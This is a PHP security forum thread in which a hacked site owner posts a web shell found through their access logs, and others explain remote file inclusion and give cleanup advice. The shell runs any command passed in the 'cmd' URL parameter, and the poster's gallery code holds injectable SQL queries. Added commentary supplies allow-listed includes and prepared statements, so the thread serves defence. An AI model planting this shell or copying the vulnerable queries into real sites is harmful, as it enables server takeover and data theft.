Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.
Nope, I was hosted with them once, and I had several instances where their servers were compromised and hundreds of their clients' sites got hacked similar to yours. They could not ever locate the cause of the breach and their only support assistance was restoring the site files to what they were two days ago.
I have switched to a dedicated server and have not had that problem any more. I asked the question just as a gauge as to whether they have finally figured out how to secure a server or not.
/*
* *** By Andi_ ***
* * smurnoffsrv (at) gmail dot com *
* * replace dot with "." *
* * replace (at) with "@" *
*
*/
//INFO table (pro and normal)
/*if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";*/
$safe = @ini_get('safe_mode');
if ($safe) $pro.="<b><i>safe_mode</i>: $safe</b>, "; else $pro.="<b><i>safe_mode</i>: NO</b>, ";
$pro .= "<i>PHP </i>".phpversion();
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<tr><td><b><?=$info ?>:</b> <?=$value;?></td></tr><?php } ?>
<tr><td><b>pro info: ip </b><?="$ip, $pro";?></td></tr>
<?
$pego = $_GET['cmd'];
$out1 = shell_exec($pego);
$out2 = exec($pego);
$out3 = system($pego, $retval);
echo "<pre>$out1</pre>";
echo "<pre>$out2</pre>";
This was the code that I found at the sites that I had filtered through my access logs... I'm not sure what it does, as I am failing in trying to reproduce what it does.
timvw wrote: It executes any shell command you pass via the cmd parameter in the URI...
If he's trying to do that... then how in the hell is he able to execute them from my site? On my server?
From what the access logs provided, he is passing a URL (this is the URL for which I found that execute script) as a parameter to my app... But the thing is... I am not including the parameter... it's actually going to a SQL statement... thus I'm not doing anything concerning server execute commands.
I am, however, doing a lot of include statements, so I'm wondering if that could be the problem.
Exploiting remote include is a common flaw (so common that most hosts don't allow remote include anymore)...
My advice: make a backup of your existing site (in case you can't find a recent backup) and take it all offline... Make sure you change all your passwords (including database credentials since it's pretty sure these have been exposed to the attackers)...
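The remote include flaw discussed above, as an added example that is not code from the original poster or the thread: a page dispatcher that never passes request data to include(). The parameter name `pid`, the `pages/` directory and the page list are assumptions for illustration.

```php
<?php
// Added example (not the original poster's code): a front controller that
// resolves a request value to a file only through a fixed allow-list, so a
// URL ("http://host/shell.txt") or a traversal ("../../etc/passwd") in the
// parameter can never reach include(). Parameter name and layout are assumed.

// Fixed allow-list: request value => file under the pages directory.
const PAGES = [
    'home'    => 'home.php',
    'gallery' => 'gallery.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a request value to an absolute path, or null if it is not allow-listed.
 * Only the allow-list keys are compared against the request; the file name
 * itself is taken from PAGES, never from the request.
 */
function resolve_page(?string $pid, string $pagesDir): ?string
{
    if ($pid === null || !array_key_exists($pid, PAGES)) {
        return null;
    }
    $path = realpath($pagesDir . '/' . PAGES[$pid]);
    $base = realpath($pagesDir);
    // Belt and braces: the resolved file must really live inside $pagesDir.
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$pagesDir = __DIR__ . '/pages';                    // assumed layout
$pid      = $_GET['pid'] ?? 'home';
$file     = resolve_page(is_string($pid) ? $pid : null, $pagesDir);

if ($file === null) {
    http_response_code(404);
    // Log the rejected value (truncated) so attempts show up in review;
    // never echo it back raw into the page.
    error_log('rejected page parameter: ' . substr((string) $pid, 0, 200));
    exit;
}
require $file;
```

Alongside the allow-list, set `allow_url_include = Off` in php.ini (and `allow_url_fopen = Off` unless the site needs it), so that even a mistake elsewhere in the code base cannot include a file fetched over HTTP; the access log entries with a URL in the query string are the tell-tale sign of attempts against an include that was not protected this way.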
<?php
/*
This page will dynamically display the photo index for the gallery
and allow the user to page thru the the gallery one page at a time
*/
require($_SERVER['DOCUMENT_ROOT'].'/Connections/opmConn2.php');
define ("ALBUM_PATH", "http://www.".$_SERVER['HTTP_HOST']."/photo_gallery/"); // relative path to photos
function display_gallerySelect($conn){
$galleryID = htmlentities($_GET['gid']); // gallery requested in the URL; used only for comparison here
// Build the HTML for the option select to change the Gallery
$query_galleryRS = "SELECT * FROM galleries WHERE `Status` = 1 ORDER BY DateID DESC";
$galleryRS = mysql_query($query_galleryRS, $conn) or die(mysql_error());
$row_galleryRS = mysql_fetch_assoc($galleryRS);
$selectHTML = "<select name=\"gid\" id=\"gid\">"; // Initiate the select variable to store the HTML
do { // Loop thru record set to populate options
$selectText = ""; // Used to set whether option is selected or not
$optionID = $row_galleryRS['GalleryID']; // separate name so the requested $galleryID is not overwritten each iteration
$galleryTitle = $row_galleryRS['Title'];
if ($optionID == $galleryID){ // if the GalleryID column = the current gallery
$currentGallery = $galleryTitle; // set current gallery
$selectText = "selected"; // Set selected text for this option
}
$selectHTML .= "<option value=\"".$optionID."\" ".$selectText.">".$galleryTitle."</option>";
} while ($row_galleryRS = mysql_fetch_assoc($galleryRS));
$selectHTML .= "</select><input name=\"pid\" type=\"hidden\" value=\"gallery\"> <input type=\"submit\" name=\"submit\" value=\"Go\">";
return $selectHTML;
} //end display_gallerySelect()
function get_currentGallery($conn){
$galleryID = htmlentities($_GET['gid']); // htmlentities() is HTML output encoding, not SQL escaping; this value goes straight into the query
$query_galleryRS = "SELECT * FROM galleries WHERE GalleryID = '$galleryID'";
$galleryRS = mysql_query($query_galleryRS, $conn) or die(mysql_error());
$row_galleryRS = mysql_fetch_assoc($galleryRS);
$currentGallery = $row_galleryRS['Title'];
return $currentGallery;
} //end get_currentGallery()
function display_galleryIndex($conn){
$photosPerRow = 2;
$colCount = 1; //Initialize the column count of the row
$galleryID = htmlentities($_GET['gid']); // interpolated into the query below without SQL escaping
$currentPhoto = "";
if (isset($_GET['id']))
$currentPhoto = $_GET['id']; // raw request value; used for comparison in this function only
$galleryIndexHtml = ""; // Initialize variable to store the the gallery index HTML
$photoNum=0; // To match the current photo that in the index
$imgFile = ""; // To store the path to the current image
$imgSrcHTML = ""; // Initialize the variable to store the <img src> HTML
$query_photosRS = "SELECT * FROM photos WHERE Gallery = '$galleryID' AND `Status` = 1 ORDER BY PhotoID";
$photosRS = mysql_query($query_photosRS, $conn) or die(mysql_error());
$row_photosRS = mysql_fetch_assoc($photosRS);
$totalPhotos = mysql_num_rows($photosRS);
$numRows = ceil($totalPhotos/$photosPerRow);
// To highlight Current photo when Gallery first loads
if ($currentPhoto == "")
$currentPhoto = $row_photosRS['PhotoID'];
do {
$photoID = $row_photosRS['PhotoID'];
$photoClass = "photoOff"; // Style for Photo Border
if ($colCount > $photosPerRow){
$galleryIndexHtml .= "</tr><tr>"; // Break to new row
$colCount = 1; // Reset Column Count
}
if ($photoID == $currentPhoto){
$photoClass = "photoOn";
// === Build HTML for Current Photo
$imgCaption = $row_photosRS['Caption'];
$imgFile = "/photo_gallery/".$row_photosRS['Gallery']."/".$photoID."_450.jpg";
$imgSrcHTML = "<img src=\"".$imgFile."\" width=\"450\" alt=\"".$imgCaption."\" class=\"$photoClass\">";
/* // Image Size
$imageSize = GetImageSize ($_SERVER['DOCUMENT_ROOT'].$imgFile);
$imageWidth = $imageSize[0];
$imageHeight = $imageSize[1];
$windowWidth = 70+$imageSize[0];
$windowHeight = 340+$imageHeight; */
}
$galleryIndexHtml .= sprintf("<td><a href=\"/photo_gallery/gallery.php?gid=$galleryID&id=$photoID\"><img src=\"/photo_gallery/%s/".$photoID."_70.jpg\" width=\"70\" alt=\"".$row_photosRS['Caption']."\" class=\"".$photoClass."\"></a></td>",$galleryID);
$colCount++;
$photoNum++;
} while ($row_photosRS = mysql_fetch_assoc($photosRS));
return $galleryIndexHtml;
} // end display_galleryIndex()
function get_imgSrcHTML($conn){
$currentPhoto = "";
$galleryID = htmlentities($_GET['gid']); // not SQL escaping; interpolated into the query below
$imgPath = "/photo_gallery/$galleryID/";
if (isset($_GET['id']))
$currentPhoto = $_GET['id']; // raw request value, passed to sprintf() into the query below without escaping
if($currentPhoto != ""){
$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND PhotoID = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID, $currentPhoto);
} else {
$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID);
}
$currentPhotosRS = mysql_query($query_currentPhotosRS, $conn) or die(mysql_error());
$row_currentPhotosRS = mysql_fetch_assoc($currentPhotosRS);
$photoID = $row_currentPhotosRS['PhotoID'];
global $currentImgCaption;
$currentImgCaption = $row_currentPhotosRS['Caption'];
$imgFile = $photoID."_450.jpg"; // To store the path to the current image
$imgSrcHTML = "<img src=\"".$imgPath.$imgFile."\" width=\"450\" alt=\"".$currentImgCaption."\" class=\"featuresImg\">";
return $imgSrcHTML;
} //end get_imgSrcHTML()
?>
And here is the function which does the file includes:
$query_currentPhotosRS = sprintf("SELECT * FROM photos WHERE Gallery = '%s' AND PhotoID = '%s' AND `Status` = 1 ORDER BY PhotoID", $galleryID, $currentPhoto);
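The gallery lookups posted above, rewritten as an added example (not the original poster's code) with integer validation of `gid`/`id` and PDO prepared statements, so the request values are never spliced into SQL text. Table and column names follow the posted code; the DSN and credentials are placeholders, and the `db()`, `intParam()` and `h()` helpers are assumptions.

```php
<?php
// Added example (not the original poster's code): the gallery queries with
// bound parameters and validated integers. DSN/credentials are placeholders.

function db(): PDO
{
    static $pdo = null;
    if ($pdo === null) {
        $pdo = new PDO('mysql:host=localhost;dbname=opm;charset=utf8mb4', 'DB_USER', 'DB_PASSWORD', [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES   => false,   // real server-side prepares
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
        ]);
    }
    return $pdo;
}

/** Read a positive integer GET parameter, or null if absent or invalid. */
function intParam(string $name): ?int
{
    $v = filter_input(INPUT_GET, $name, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return ($v === false || $v === null) ? null : $v;
}

/** Escape for HTML at output time (not before the query). */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function get_currentGallery(int $galleryID): ?string
{
    $stmt = db()->prepare('SELECT Title FROM galleries WHERE GalleryID = ? AND `Status` = 1');
    $stmt->execute([$galleryID]);
    $row = $stmt->fetch();
    return $row ? $row['Title'] : null;
}

/** First photo of the gallery, or the requested one if $photoID is given. */
function get_currentPhoto(int $galleryID, ?int $photoID): ?array
{
    if ($photoID === null) {
        $stmt = db()->prepare('SELECT PhotoID, Caption FROM photos WHERE Gallery = ? AND `Status` = 1 ORDER BY PhotoID LIMIT 1');
        $stmt->execute([$galleryID]);
    } else {
        $stmt = db()->prepare('SELECT PhotoID, Caption FROM photos WHERE Gallery = ? AND PhotoID = ? AND `Status` = 1');
        $stmt->execute([$galleryID, $photoID]);
    }
    $row = $stmt->fetch();
    return $row ?: null;
}

function get_imgSrcHTML(int $galleryID, ?int $photoID): string
{
    $row = get_currentPhoto($galleryID, $photoID);
    if ($row === null) {
        return '';
    }
    // Both path components are integers, so the src cannot leave /photo_gallery/.
    $src = sprintf('/photo_gallery/%d/%d_450.jpg', $galleryID, (int) $row['PhotoID']);
    return '<img src="' . h($src) . '" width="450" alt="' . h((string) $row['Caption']) . '" class="featuresImg">';
}

$gid = intParam('gid');
if ($gid === null) {
    http_response_code(400);
    exit('missing or invalid gallery id');
}
echo get_imgSrcHTML($gid, intParam('id'));
```

The point of the rewrite is the split of responsibilities: `htmlentities()` in the posted code is an HTML output encoder, not a SQL escaping function (on the PHP versions that still had the `mysql_*` API it leaves single quotes alone by default), so the quoted values in those queries remain injectable. Validating the ids as integers and binding them as parameters removes the injection; HTML encoding moves to the point where values are written into the page.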